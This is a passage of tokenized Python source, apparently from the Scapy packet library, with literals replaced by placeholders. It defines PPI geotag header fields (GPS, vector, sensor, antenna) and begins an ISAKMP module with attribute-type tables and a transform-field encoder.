<EOL> return x <EOL> def i2repr ( self , pkt , x ) : <EOL> if x is None : <EOL> y = <NUM_LIT:0> <EOL> else : <EOL> y = self . i2h ( pkt , x ) <EOL> return "<STR_LIT>" % ( y ) <EOL> class Fixed3_7Field ( LEIntField ) : <EOL> def i2h ( self , pkt , x ) : <EOL> if x is not None : <EOL> if ( x < <NUM_LIT:0> ) : <EOL> warning ( "<STR_LIT>" % x ) <EOL> x = <NUM_LIT:0> <EOL> elif ( x > <NUM_LIT> ) : <EOL> warning ( "<STR_LIT>" % x ) <EOL> x = <NUM_LIT> <EOL> x = ( x - <NUM_LIT> ) * <NUM_LIT> <EOL> return x <EOL> def h2i ( self , pkt , x ) : <EOL> if x is not None : <EOL> if ( x <= - <NUM_LIT> ) : <EOL> warning ( "<STR_LIT>" % x ) <EOL> x = - <NUM_LIT> <EOL> elif ( x >= <NUM_LIT> ) : <EOL> warning ( "<STR_LIT>" % x ) <EOL> x = <NUM_LIT> <EOL> x = int ( round ( ( x + <NUM_LIT> ) * <NUM_LIT> ) ) <EOL> return x <EOL> def i2m ( self , pkt , x ) : <EOL> """<STR_LIT>""" <EOL> if x is None : <EOL> x = self . 
h2i ( pkt , <NUM_LIT:0> ) <EOL> return x <EOL> def i2repr ( self , pkt , x ) : <EOL> if x is None : <EOL> y = <NUM_LIT:0> <EOL> else : <EOL> y = self . i2h ( pkt , x ) <EOL> return "<STR_LIT>" % ( y ) <EOL> class Fixed6_4Field ( LEIntField ) : <EOL> def i2h ( self , pkt , x ) : <EOL> if x is not None : <EOL> if ( x < <NUM_LIT:0> ) : <EOL> warning ( "<STR_LIT>" % x ) <EOL> x = <NUM_LIT:0> <EOL> elif ( x > <NUM_LIT> ) : <EOL> warning ( "<STR_LIT>" % x ) <EOL> x = <NUM_LIT> <EOL> x = ( x - <NUM_LIT> ) * <NUM_LIT> <EOL> return x <EOL> def h2i ( self , pkt , x ) : <EOL> if x is not None : <EOL> if ( x <= - <NUM_LIT> ) : <EOL> warning ( "<STR_LIT>" % x ) <EOL> x = - <NUM_LIT> <EOL> elif ( x >= <NUM_LIT> ) : <EOL> warning ( "<STR_LIT>" % x ) <EOL> x = <NUM_LIT> <EOL> x = int ( round ( ( x + <NUM_LIT> ) * <NUM_LIT> ) ) <EOL> return x <EOL> def i2m ( self , pkt , x ) : <EOL> """<STR_LIT>""" <EOL> if x is None : <EOL> x = self . h2i ( pkt , <NUM_LIT:0> ) <EOL> return x <EOL> def i2repr ( self , pkt , x ) : <EOL> if x is None : <EOL> y = <NUM_LIT:0> <EOL> else : <EOL> y = self . i2h ( pkt , x ) <EOL> return "<STR_LIT>" % ( y ) <EOL> class NSCounter_Field ( LEIntField ) : <EOL> def i2h ( self , pkt , x ) : <EOL> if x is not None : <EOL> if ( x < <NUM_LIT:0> ) : <EOL> warning ( "<STR_LIT>" % x ) <EOL> x = <NUM_LIT:0> <EOL> elif ( x >= <NUM_LIT:2> ** <NUM_LIT:32> ) : <EOL> warning ( "<STR_LIT>" % x ) <EOL> x = <NUM_LIT:2> ** <NUM_LIT:32> - <NUM_LIT:1> <EOL> x = ( x / <NUM_LIT> ) <EOL> return x <EOL> def h2i ( self , pkt , x ) : <EOL> if x is not None : <EOL> if ( x < <NUM_LIT:0> ) : <EOL> warning ( "<STR_LIT>" % x ) <EOL> x = <NUM_LIT:0> <EOL> elif ( x >= ( <NUM_LIT:2> ** <NUM_LIT:32> ) / <NUM_LIT> ) : <EOL> warning ( "<STR_LIT>" % x ) <EOL> x = ( <NUM_LIT:2> ** <NUM_LIT:32> - <NUM_LIT:1> ) / <NUM_LIT> <EOL> x = int ( round ( ( x * <NUM_LIT> ) ) ) <EOL> return x <EOL> def i2repr ( self , pkt , x ) : <EOL> if x is None : <EOL> y = <NUM_LIT:0> <EOL> else : <EOL> y = self . 
i2h ( pkt , x ) <EOL> return "<STR_LIT>" % ( y ) <EOL> class UTCTimeField ( IntField ) : <EOL> def __init__ ( self , name , default , epoch = time . gmtime ( <NUM_LIT:0> ) , strf = "<STR_LIT>" ) : <EOL> IntField . __init__ ( self , name , default ) <EOL> self . epoch = epoch <EOL> self . delta = time . mktime ( epoch ) - time . mktime ( time . gmtime ( <NUM_LIT:0> ) ) <EOL> self . strf = strf <EOL> def i2repr ( self , pkt , x ) : <EOL> if x is None : <EOL> x = <NUM_LIT:0> <EOL> x = int ( x ) + self . delta <EOL> t = time . strftime ( self . strf , time . gmtime ( x ) ) <EOL> return "<STR_LIT>" % ( t , x ) <EOL> class LETimeField ( UTCTimeField , LEIntField ) : <EOL> def __init__ ( self , name , default , epoch = time . gmtime ( <NUM_LIT:0> ) , strf = "<STR_LIT>" ) : <EOL> LEIntField . __init__ ( self , name , default ) <EOL> self . epoch = epoch <EOL> self . delta = time . mktime ( epoch ) - time . mktime ( time . gmtime ( <NUM_LIT:0> ) ) <EOL> self . strf = strf <EOL> class SignedByteField ( Field ) : <EOL> def __init__ ( self , name , default ) : <EOL> Field . __init__ ( self , name , default , "<STR_LIT:b>" ) <EOL> def randval ( self ) : <EOL> return RandSByte ( ) <EOL> class XLEShortField ( LEShortField , XShortField ) : <EOL> def i2repr ( self , pkt , x ) : <EOL> return XShortField . i2repr ( self , pkt , x ) <EOL> class XLEIntField ( LEIntField , XIntField ) : <EOL> def i2repr ( self , pkt , x ) : <EOL> return XIntField . i2repr ( self , pkt , x ) <EOL> class GPSTime_Field ( LETimeField ) : <EOL> def __init__ ( self , name , default ) : <EOL> return LETimeField . 
__init__ ( self , name , default , strf = "<STR_LIT>" ) <EOL> class VectorFlags_Field ( XLEIntField ) : <EOL> """<STR_LIT>""" <EOL> _fwdstr = "<STR_LIT>" <EOL> _resmask = <NUM_LIT> <EOL> _relmask = <NUM_LIT> <EOL> _relnames = [ "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" ] <EOL> _relvals = [ <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ] <EOL> def i2repr ( self , pkt , x ) : <EOL> if x is None : <EOL> return str ( x ) <EOL> r = [ ] <EOL> if ( x & <NUM_LIT> ) : <EOL> r . append ( self . _fwdstr ) <EOL> i = ( x & self . _relmask ) >> <NUM_LIT:1> <EOL> r . append ( self . _relnames [ i ] ) <EOL> i = x & self . _resmask <EOL> if ( i ) : <EOL> r . append ( "<STR_LIT>" % i ) <EOL> sout = "<STR_LIT:+>" . join ( r ) <EOL> return sout <EOL> def any2i ( self , pkt , x ) : <EOL> if type ( x ) is str : <EOL> r = x . split ( "<STR_LIT:+>" ) <EOL> y = <NUM_LIT:0> <EOL> for value in r : <EOL> if ( value == self . _fwdstr ) : <EOL> y |= <NUM_LIT> <EOL> elif ( value in self . _relnames ) : <EOL> i = self . _relnames . index ( value ) <EOL> y &= ( ~ self . _relmask ) <EOL> y |= self . _relvals [ i ] <EOL> else : <EOL> pass <EOL> else : <EOL> y = x <EOL> return y <EOL> class HCSIFlagsField ( FlagsField ) : <EOL> """<STR_LIT>""" <EOL> def i2m ( self , pkt , val ) : <EOL> if val is None : <EOL> val = <NUM_LIT:0> <EOL> if ( pkt ) : <EOL> for i in range ( len ( self . names ) ) : <EOL> name = self . names [ i ] [ <NUM_LIT:0> ] <EOL> value = pkt . getfieldval ( name ) <EOL> if value is not None : <EOL> val |= <NUM_LIT:1> << i <EOL> return val <EOL> class HCSINullField ( StrFixedLenField ) : <EOL> def __init__ ( self , name , default ) : <EOL> return StrFixedLenField . __init__ ( self , name , default , length = <NUM_LIT:0> ) <EOL> class HCSIDescField ( StrFixedLenField ) : <EOL> def __init__ ( self , name , default ) : <EOL> return StrFixedLenField . 
__init__ ( self , name , default , length = <NUM_LIT:32> ) <EOL> class HCSIAppField ( StrFixedLenField ) : <EOL> def __init__ ( self , name , default ) : <EOL> return StrFixedLenField . __init__ ( self , name , default , length = <NUM_LIT> ) <EOL> def _FlagsList ( myfields ) : <EOL> flags = [ ] <EOL> for i in range ( <NUM_LIT:32> ) : <EOL> flags . append ( "<STR_LIT>" % i ) <EOL> for i in myfields . keys ( ) : <EOL> flags [ i ] = myfields [ i ] <EOL> return flags <EOL> _hcsi_gps_flags = _FlagsList ( { <NUM_LIT:0> : "<STR_LIT>" , <NUM_LIT:1> : "<STR_LIT>" , <NUM_LIT:2> : "<STR_LIT>" , <EOL> <NUM_LIT:3> : "<STR_LIT>" , <NUM_LIT:4> : "<STR_LIT>" , <EOL> <NUM_LIT:5> : "<STR_LIT>" , <NUM_LIT:6> : "<STR_LIT>" , <EOL> <NUM_LIT:7> : "<STR_LIT>" , <NUM_LIT:8> : "<STR_LIT>" } ) <EOL> _hcsi_vector_char_flags = _FlagsList ( { <NUM_LIT:0> : "<STR_LIT>" , <NUM_LIT:1> : "<STR_LIT>" , <EOL> <NUM_LIT:2> : "<STR_LIT>" , <NUM_LIT:3> : "<STR_LIT>" , <NUM_LIT:4> : "<STR_LIT>" , <EOL> <NUM_LIT:8> : "<STR_LIT>" , <NUM_LIT:9> : "<STR_LIT>" , <NUM_LIT:10> : "<STR_LIT>" , <EOL> <NUM_LIT:11> : "<STR_LIT>" , <NUM_LIT:12> : "<STR_LIT>" } ) <EOL> _hcsi_antenna_flags = _FlagsList ( { <NUM_LIT:1> : "<STR_LIT>" , <NUM_LIT:2> : "<STR_LIT>" , <EOL> <NUM_LIT:3> : "<STR_LIT>" , <NUM_LIT:4> : "<STR_LIT>" , <EOL> <NUM_LIT:16> : "<STR_LIT>" , <NUM_LIT> : "<STR_LIT>" } ) <EOL> """<STR_LIT>""" <EOL> def _HCSITest ( pkt , ibit , name ) : <EOL> if pkt . present is None : <EOL> return ( pkt . getfieldval ( name ) is not None ) <EOL> return pkt . present & ibit <EOL> def _HCSIBuildFields ( fields ) : <EOL> names = [ f . name for f in fields ] <EOL> cond_fields = [ HCSIFlagsField ( '<STR_LIT>' , None , - len ( names ) , names ) ] <EOL> for i in range ( len ( names ) ) : <EOL> ibit = <NUM_LIT:1> << i <EOL> seval = "<STR_LIT>" % ( ibit , names [ i ] ) <EOL> test = eval ( seval ) <EOL> cond_fields . 
append ( ConditionalField ( fields [ i ] , test ) ) <EOL> return cond_fields <EOL> class HCSIPacket ( Packet ) : <EOL> name = "<STR_LIT>" <EOL> fields_desc = [ LEShortField ( '<STR_LIT>' , None ) , <EOL> LEShortField ( '<STR_LIT>' , None ) , <EOL> ByteField ( '<STR_LIT>' , CURR_GEOTAG_VER ) , <EOL> ByteField ( '<STR_LIT>' , <NUM_LIT:0> ) , <EOL> LEShortField ( '<STR_LIT>' , None ) ] <EOL> def post_build ( self , p , pay ) : <EOL> if self . pfh_length is None : <EOL> l = len ( p ) - <NUM_LIT:4> <EOL> sl = struct . pack ( '<STR_LIT>' , l ) <EOL> p = p [ : <NUM_LIT:2> ] + sl + p [ <NUM_LIT:4> : ] <EOL> if self . geotag_len is None : <EOL> l_g = len ( p ) - <NUM_LIT:4> <EOL> sl_g = struct . pack ( '<STR_LIT>' , l_g ) <EOL> p = p [ : <NUM_LIT:6> ] + sl_g + p [ <NUM_LIT:8> : ] <EOL> p += pay <EOL> return p <EOL> def extract_padding ( self , p ) : <EOL> return "<STR_LIT>" , p <EOL> GPS_Fields = [ FlagsField ( "<STR_LIT>" , None , - <NUM_LIT:32> , _hcsi_gps_flags ) , <EOL> Fixed3_7Field ( "<STR_LIT>" , None ) , <EOL> Fixed3_7Field ( "<STR_LIT>" , None ) , Fixed6_4Field ( "<STR_LIT>" , None ) , <EOL> Fixed6_4Field ( "<STR_LIT>" , None ) , GPSTime_Field ( "<STR_LIT>" , None ) , <EOL> NSCounter_Field ( "<STR_LIT>" , None ) , Fixed3_6Field ( "<STR_LIT>" , None ) , <EOL> Fixed3_6Field ( "<STR_LIT>" , None ) , NSCounter_Field ( "<STR_LIT>" , None ) , <EOL> HCSINullField ( "<STR_LIT>" , None ) , HCSINullField ( "<STR_LIT>" , None ) , <EOL> HCSINullField ( "<STR_LIT>" , None ) , HCSINullField ( "<STR_LIT>" , None ) , <EOL> HCSINullField ( "<STR_LIT>" , None ) , HCSINullField ( "<STR_LIT>" , None ) , <EOL> HCSINullField ( "<STR_LIT>" , None ) , HCSINullField ( "<STR_LIT>" , None ) , <EOL> HCSINullField ( "<STR_LIT>" , None ) , HCSINullField ( "<STR_LIT>" , None ) , <EOL> HCSINullField ( "<STR_LIT>" , None ) , HCSINullField ( "<STR_LIT>" , None ) , <EOL> HCSINullField ( "<STR_LIT>" , None ) , HCSINullField ( "<STR_LIT>" , None ) , <EOL> HCSINullField ( "<STR_LIT>" , None ) , 
HCSINullField ( "<STR_LIT>" , None ) , <EOL> HCSINullField ( "<STR_LIT>" , None ) , HCSINullField ( "<STR_LIT>" , None ) , <EOL> HCSIDescField ( "<STR_LIT>" , None ) , XLEIntField ( "<STR_LIT>" , None ) , <EOL> HCSIAppField ( "<STR_LIT>" , None ) , HCSINullField ( "<STR_LIT>" , None ) ] <EOL> class GPS ( HCSIPacket ) : <EOL> name = "<STR_LIT>" <EOL> fields_desc = [ LEShortField ( '<STR_LIT>' , PPI_GPS ) , <EOL> LEShortField ( '<STR_LIT>' , None ) , <EOL> ByteField ( '<STR_LIT>' , CURR_GEOTAG_VER ) , <EOL> ByteField ( '<STR_LIT>' , <NUM_LIT:0> ) , <EOL> LEShortField ( '<STR_LIT>' , None ) ] + _HCSIBuildFields ( GPS_Fields ) <EOL> VEC_Fields = [ VectorFlags_Field ( "<STR_LIT>" , None ) , <EOL> FlagsField ( "<STR_LIT>" , None , - <NUM_LIT:32> , _hcsi_vector_char_flags ) , <EOL> Fixed3_6Field ( "<STR_LIT>" , None ) , Fixed3_6Field ( "<STR_LIT>" , None ) , <EOL> Fixed3_6Field ( "<STR_LIT>" , None ) , Fixed6_4Field ( "<STR_LIT>" , None ) , <EOL> Fixed6_4Field ( "<STR_LIT>" , None ) , Fixed6_4Field ( "<STR_LIT>" , None ) , <EOL> HCSINullField ( "<STR_LIT>" , None ) , HCSINullField ( "<STR_LIT>" , None ) , <EOL> HCSINullField ( "<STR_LIT>" , None ) , HCSINullField ( "<STR_LIT>" , None ) , <EOL> HCSINullField ( "<STR_LIT>" , None ) , HCSINullField ( "<STR_LIT>" , None ) , <EOL> HCSINullField ( "<STR_LIT>" , None ) , HCSINullField ( "<STR_LIT>" , None ) , <EOL> Fixed3_6Field ( "<STR_LIT>" , None ) , Fixed6_4Field ( "<STR_LIT>" , None ) , <EOL> HCSINullField ( "<STR_LIT>" , None ) , HCSINullField ( "<STR_LIT>" , None ) , <EOL> HCSINullField ( "<STR_LIT>" , None ) , HCSINullField ( "<STR_LIT>" , None ) , <EOL> HCSINullField ( "<STR_LIT>" , None ) , HCSINullField ( "<STR_LIT>" , None ) , <EOL> HCSINullField ( "<STR_LIT>" , None ) , HCSINullField ( "<STR_LIT>" , None ) , <EOL> HCSINullField ( "<STR_LIT>" , None ) , HCSINullField ( "<STR_LIT>" , None ) , <EOL> HCSIDescField ( "<STR_LIT>" , None ) , XLEIntField ( "<STR_LIT>" , None ) , <EOL> HCSIAppField ( "<STR_LIT>" , None ) , 
HCSINullField ( "<STR_LIT>" , None ) ] <EOL> class Vector ( HCSIPacket ) : <EOL> name = "<STR_LIT>" <EOL> fields_desc = [ LEShortField ( '<STR_LIT>' , PPI_VECTOR ) , <EOL> LEShortField ( '<STR_LIT>' , None ) , <EOL> ByteField ( '<STR_LIT>' , CURR_GEOTAG_VER ) , <EOL> ByteField ( '<STR_LIT>' , <NUM_LIT:0> ) , <EOL> LEShortField ( '<STR_LIT>' , None ) ] + _HCSIBuildFields ( VEC_Fields ) <EOL> sensor_types = { <NUM_LIT:1> : "<STR_LIT>" , <EOL> <NUM_LIT:2> : "<STR_LIT>" , <EOL> <NUM_LIT:3> : "<STR_LIT>" , <EOL> <NUM_LIT:100> : "<STR_LIT>" , <EOL> <NUM_LIT> : "<STR_LIT>" , <EOL> <NUM_LIT:1000> : "<STR_LIT>" , <EOL> <NUM_LIT> : "<STR_LIT>" , <EOL> <NUM_LIT> : "<STR_LIT>" , <EOL> <NUM_LIT> : "<STR_LIT>" , <EOL> <NUM_LIT> : "<STR_LIT>" <EOL> } <EOL> SENS_Fields = [ LEShortEnumField ( '<STR_LIT>' , None , sensor_types ) , <EOL> SignedByteField ( '<STR_LIT>' , None ) , <EOL> Fixed6_4Field ( '<STR_LIT>' , None ) , <EOL> Fixed6_4Field ( '<STR_LIT>' , None ) , <EOL> Fixed6_4Field ( '<STR_LIT>' , None ) , <EOL> Fixed6_4Field ( '<STR_LIT>' , None ) , <EOL> Fixed6_4Field ( '<STR_LIT>' , None ) , <EOL> HCSINullField ( "<STR_LIT>" , None ) , HCSINullField ( "<STR_LIT>" , None ) , <EOL> HCSINullField ( "<STR_LIT>" , None ) , HCSINullField ( "<STR_LIT>" , None ) , <EOL> HCSINullField ( "<STR_LIT>" , None ) , HCSINullField ( "<STR_LIT>" , None ) , <EOL> HCSINullField ( "<STR_LIT>" , None ) , HCSINullField ( "<STR_LIT>" , None ) , <EOL> HCSINullField ( "<STR_LIT>" , None ) , HCSINullField ( "<STR_LIT>" , None ) , <EOL> HCSINullField ( "<STR_LIT>" , None ) , HCSINullField ( "<STR_LIT>" , None ) , <EOL> HCSINullField ( "<STR_LIT>" , None ) , HCSINullField ( "<STR_LIT>" , None ) , <EOL> HCSINullField ( "<STR_LIT>" , None ) , HCSINullField ( "<STR_LIT>" , None ) , <EOL> HCSINullField ( "<STR_LIT>" , None ) , HCSINullField ( "<STR_LIT>" , None ) , <EOL> HCSINullField ( "<STR_LIT>" , None ) , HCSINullField ( "<STR_LIT>" , None ) , <EOL> HCSINullField ( "<STR_LIT>" , None ) , <EOL> 
HCSIDescField ( "<STR_LIT>" , None ) , XLEIntField ( "<STR_LIT>" , None ) , <EOL> HCSIAppField ( "<STR_LIT>" , None ) , HCSINullField ( "<STR_LIT>" , None ) ] <EOL> class Sensor ( HCSIPacket ) : <EOL> name = "<STR_LIT>" <EOL> fields_desc = [ LEShortField ( '<STR_LIT>' , PPI_SENSOR ) , <EOL> LEShortField ( '<STR_LIT>' , None ) , <EOL> ByteField ( '<STR_LIT>' , CURR_GEOTAG_VER ) , <EOL> ByteField ( '<STR_LIT>' , <NUM_LIT:0> ) , <EOL> LEShortField ( '<STR_LIT>' , None ) ] + _HCSIBuildFields ( SENS_Fields ) <EOL> ANT_Fields = [ FlagsField ( "<STR_LIT>" , None , - <NUM_LIT:32> , _hcsi_antenna_flags ) , <EOL> ByteField ( "<STR_LIT>" , None ) , <EOL> Fixed3_6Field ( "<STR_LIT>" , None ) , Fixed3_6Field ( "<STR_LIT>" , None ) , <EOL> Fixed3_6Field ( "<STR_LIT>" , None ) , XLEShortField ( "<STR_LIT>" , None ) , <EOL> HCSINullField ( "<STR_LIT>" , None ) , HCSINullField ( "<STR_LIT>" , None ) , <EOL> HCSINullField ( "<STR_LIT>" , None ) , HCSINullField ( "<STR_LIT>" , None ) , <EOL> HCSINullField ( "<STR_LIT>" , None ) , HCSINullField ( "<STR_LIT>" , None ) , <EOL> HCSINullField ( "<STR_LIT>" , None ) , HCSINullField ( "<STR_LIT>" , None ) , <EOL> HCSINullField ( "<STR_LIT>" , None ) , HCSINullField ( "<STR_LIT>" , None ) , <EOL> HCSINullField ( "<STR_LIT>" , None ) , HCSINullField ( "<STR_LIT>" , None ) , <EOL> HCSINullField ( "<STR_LIT>" , None ) , HCSINullField ( "<STR_LIT>" , None ) , <EOL> HCSINullField ( "<STR_LIT>" , None ) , HCSINullField ( "<STR_LIT>" , None ) , <EOL> HCSINullField ( "<STR_LIT>" , None ) , HCSINullField ( "<STR_LIT>" , None ) , <EOL> HCSINullField ( "<STR_LIT>" , None ) , HCSINullField ( "<STR_LIT>" , None ) , <EOL> HCSIDescField ( "<STR_LIT>" , None ) , HCSIDescField ( "<STR_LIT>" , None ) , <EOL> HCSIDescField ( "<STR_LIT>" , None ) , XLEIntField ( "<STR_LIT>" , None ) , <EOL> HCSIAppField ( "<STR_LIT>" , None ) , HCSINullField ( "<STR_LIT>" , None ) ] <EOL> class Antenna ( HCSIPacket ) : <EOL> name = "<STR_LIT>" <EOL> fields_desc = [ LEShortField 
( '<STR_LIT>' , PPI_ANTENNA ) , <EOL> LEShortField ( '<STR_LIT>' , None ) , <EOL> ByteField ( '<STR_LIT>' , CURR_GEOTAG_VER ) , <EOL> ByteField ( '<STR_LIT>' , <NUM_LIT:0> ) , <EOL> LEShortField ( '<STR_LIT>' , None ) ] + _HCSIBuildFields ( ANT_Fields ) <EOL> addPPIType ( PPI_GPS , GPS ) <EOL> addPPIType ( PPI_VECTOR , Vector ) <EOL> addPPIType ( PPI_SENSOR , Sensor ) <EOL> addPPIType ( PPI_ANTENNA , Antenna ) </s>
<s> """<STR_LIT>""" <EOL> import struct <EOL> from scapy . packet import * <EOL> from scapy . fields import * <EOL> from scapy . ansmachine import * <EOL> from scapy . layers . inet import IP , UDP <EOL> from scapy . sendrecv import sr <EOL> ISAKMPAttributeTypes = { "<STR_LIT>" : ( <NUM_LIT:1> , { "<STR_LIT>" : <NUM_LIT:1> , <EOL> "<STR_LIT>" : <NUM_LIT:2> , <EOL> "<STR_LIT>" : <NUM_LIT:3> , <EOL> "<STR_LIT>" : <NUM_LIT:4> , <EOL> "<STR_LIT>" : <NUM_LIT:5> , <EOL> "<STR_LIT>" : <NUM_LIT:6> , <EOL> "<STR_LIT>" : <NUM_LIT:7> , <EOL> "<STR_LIT>" : <NUM_LIT:8> , } , <NUM_LIT:0> ) , <EOL> "<STR_LIT>" : ( <NUM_LIT:2> , { "<STR_LIT>" : <NUM_LIT:1> , <EOL> "<STR_LIT>" : <NUM_LIT:2> , <EOL> "<STR_LIT>" : <NUM_LIT:3> , <EOL> "<STR_LIT>" : <NUM_LIT:4> , <EOL> "<STR_LIT>" : <NUM_LIT:5> , <EOL> "<STR_LIT>" : <NUM_LIT:6> , } , <NUM_LIT:0> ) , <EOL> "<STR_LIT>" : ( <NUM_LIT:3> , { "<STR_LIT>" : <NUM_LIT:1> , <EOL> "<STR_LIT>" : <NUM_LIT:2> , <EOL> "<STR_LIT>" : <NUM_LIT:3> , <EOL> "<STR_LIT>" : <NUM_LIT:4> , <EOL> "<STR_LIT>" : <NUM_LIT:5> , <EOL> "<STR_LIT>" : <NUM_LIT:6> , <EOL> "<STR_LIT>" : <NUM_LIT:7> , <EOL> "<STR_LIT>" : <NUM_LIT:8> , <EOL> "<STR_LIT>" : <NUM_LIT> , <EOL> "<STR_LIT>" : <NUM_LIT> , <EOL> "<STR_LIT>" : <NUM_LIT> , <EOL> "<STR_LIT>" : <NUM_LIT> , <EOL> "<STR_LIT>" : <NUM_LIT> , <EOL> "<STR_LIT>" : <NUM_LIT> , <EOL> "<STR_LIT>" : <NUM_LIT> , <EOL> "<STR_LIT>" : <NUM_LIT> , <EOL> "<STR_LIT>" : <NUM_LIT> , <EOL> "<STR_LIT>" : <NUM_LIT> , <EOL> "<STR_LIT>" : <NUM_LIT> , <EOL> "<STR_LIT>" : <NUM_LIT> , <EOL> "<STR_LIT>" : <NUM_LIT> , <EOL> "<STR_LIT>" : <NUM_LIT> , } , <NUM_LIT:0> ) , <EOL> "<STR_LIT>" : ( <NUM_LIT:4> , { "<STR_LIT>" : <NUM_LIT:1> , <EOL> "<STR_LIT>" : <NUM_LIT:2> , <EOL> "<STR_LIT>" : <NUM_LIT:3> , <EOL> "<STR_LIT>" : <NUM_LIT:4> , <EOL> "<STR_LIT>" : <NUM_LIT:5> , <EOL> "<STR_LIT>" : <NUM_LIT> , <EOL> "<STR_LIT>" : <NUM_LIT:15> , <EOL> "<STR_LIT>" : <NUM_LIT:16> , <EOL> "<STR_LIT>" : <NUM_LIT> , <EOL> "<STR_LIT>" : <NUM_LIT> , } , <NUM_LIT:0> ) 
, <EOL> "<STR_LIT>" : ( <NUM_LIT:5> , { "<STR_LIT>" : <NUM_LIT:1> , <EOL> "<STR_LIT>" : <NUM_LIT:2> , <EOL> "<STR_LIT>" : <NUM_LIT:3> } , <NUM_LIT:0> ) , <EOL> "<STR_LIT>" : ( <NUM_LIT:6> , { } , <NUM_LIT:1> ) , <EOL> "<STR_LIT>" : ( <NUM_LIT:7> , { } , <NUM_LIT:1> ) , <EOL> "<STR_LIT>" : ( <NUM_LIT:8> , { } , <NUM_LIT:1> ) , <EOL> "<STR_LIT>" : ( <NUM_LIT:9> , { } , <NUM_LIT:1> ) , <EOL> "<STR_LIT>" : ( <NUM_LIT:10> , { } , <NUM_LIT:1> ) , <EOL> "<STR_LIT>" : ( <NUM_LIT:11> , { "<STR_LIT>" : <NUM_LIT:1> , <EOL> "<STR_LIT>" : <NUM_LIT:2> , } , <NUM_LIT:0> ) , <EOL> "<STR_LIT>" : ( <NUM_LIT:12> , { } , <NUM_LIT:1> ) , <EOL> "<STR_LIT>" : ( <NUM_LIT> , { } , <NUM_LIT:0> ) , <EOL> "<STR_LIT>" : ( <NUM_LIT> , { } , <NUM_LIT:0> ) , <EOL> "<STR_LIT>" : ( <NUM_LIT:15> , { } , <NUM_LIT:0> ) , <EOL> "<STR_LIT>" : ( <NUM_LIT:16> , { } , <NUM_LIT:1> ) , <EOL> } <EOL> ISAKMPTransformTypes = ISAKMPAttributeTypes <EOL> ISAKMPTransformNum = { } <EOL> for n in ISAKMPTransformTypes : <EOL> val = ISAKMPTransformTypes [ n ] <EOL> tmp = { } <EOL> for e in val [ <NUM_LIT:1> ] : <EOL> tmp [ val [ <NUM_LIT:1> ] [ e ] ] = e <EOL> ISAKMPTransformNum [ val [ <NUM_LIT:0> ] ] = ( n , tmp , val [ <NUM_LIT:2> ] ) <EOL> del ( n ) <EOL> del ( e ) <EOL> del ( tmp ) <EOL> del ( val ) <EOL> class ISAKMPTransformSetField ( StrLenField ) : <EOL> islist = <NUM_LIT:1> <EOL> def type2num ( self , typval ) : <EOL> typ = typval [ <NUM_LIT:0> ] <EOL> val = typval [ <NUM_LIT:1> ] <EOL> type_val , enc_dict , tlv = ISAKMPTransformTypes . get ( typval [ <NUM_LIT:0> ] , ( typval [ <NUM_LIT:0> ] , { } , <NUM_LIT:0> ) ) <EOL> val = enc_dict . get ( val , val ) <EOL> s = b"<STR_LIT>" <EOL> if ( val & ~ <NUM_LIT> ) : <EOL> if not tlv : <EOL> warning ( "<STR_LIT>" % typval [ <NUM_LIT:0> ] ) <EOL> n = <NUM_LIT:0> <EOL> while val : <EOL> s = bytes ( [ ( val & <NUM_LIT> ) ] ) + s <EOL> val >>= <NUM_LIT:8> <EOL> n += <NUM_LIT:1> <EOL> val = n <EOL> else : <EOL> type_val |= <NUM_LIT> <EOL> return struct . 
pack ( "<STR_LIT>" , type_val , val ) + s <EOL> def num2type ( self , typ , enc ) : <EOL> val = ISAKMPTransformNum . get ( typ , ( typ , { } ) ) <EOL> enc = val [ <NUM_LIT:1> ] . get ( enc , enc ) <EOL> return ( val [ <NUM_LIT:0> ] , enc ) <EOL> def i2m ( self , pkt , i ) : <EOL> if i is None : <EOL> return b"<STR_LIT>" <EOL> i = map ( self . type2num , i ) <EOL> return b"<STR_LIT>" . join ( i ) <EOL> def m2i ( self , pkt , m ) : <EOL> lst = [ ] <EOL> while len ( m ) >= <NUM_LIT:4> : <EOL> trans_type , = struct . unpack ( "<STR_LIT>" , m [ : <NUM_LIT:2> ] ) <EOL> is_tlv = not ( trans_type & <NUM_LIT> ) <EOL> if is_tlv : <EOL> value_len , = struct . unpack ( "<STR_LIT>" , m [ <NUM_LIT:2> : <NUM_LIT:4> ] ) <EOL> if value_len + <NUM_LIT:4> > len ( m ) : <EOL> warning ( "<STR_LIT>" % trans_type ) <EOL> value = m [ <NUM_LIT:4> : <NUM_LIT:4> + value_len ] <EOL> r = <NUM_LIT:0> <EOL> for i in struct . unpack ( "<STR_LIT>" % ( "<STR_LIT:B>" * len ( value ) , ) , value ) : <EOL> r = ( r << <NUM_LIT:8> ) | i <EOL> value = r <EOL> else : <EOL> trans_type &= <NUM_LIT> <EOL> value_len = <NUM_LIT:0> <EOL> value , = struct . unpack ( "<STR_LIT>" , m [ <NUM_LIT:2> : <NUM_LIT:4> ] ) <EOL> m = m [ <NUM_LIT:4> + value_len : ] <EOL> lst . append ( self . num2type ( trans_type , value ) ) <EOL> if len ( m ) > <NUM_LIT:0> : <EOL> warning ( "<STR_LIT>" % m ) <EOL> return lst <EOL> ISAKMP_payload_type = [ "<STR_LIT:None>" , "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , <EOL> "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" ] <EOL> ISAKMP_exchange_type = [ "<STR_LIT:None>" , "<STR_LIT>" , "<STR_LIT>" , <EOL> "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT:info>" ] <EOL> class ISAKMP_class ( Packet ) : <EOL> def guess_payload_class ( self , payload ) : <EOL> np = self . next_payload <EOL> if np == <NUM_LIT:0> : <EOL> return conf . 
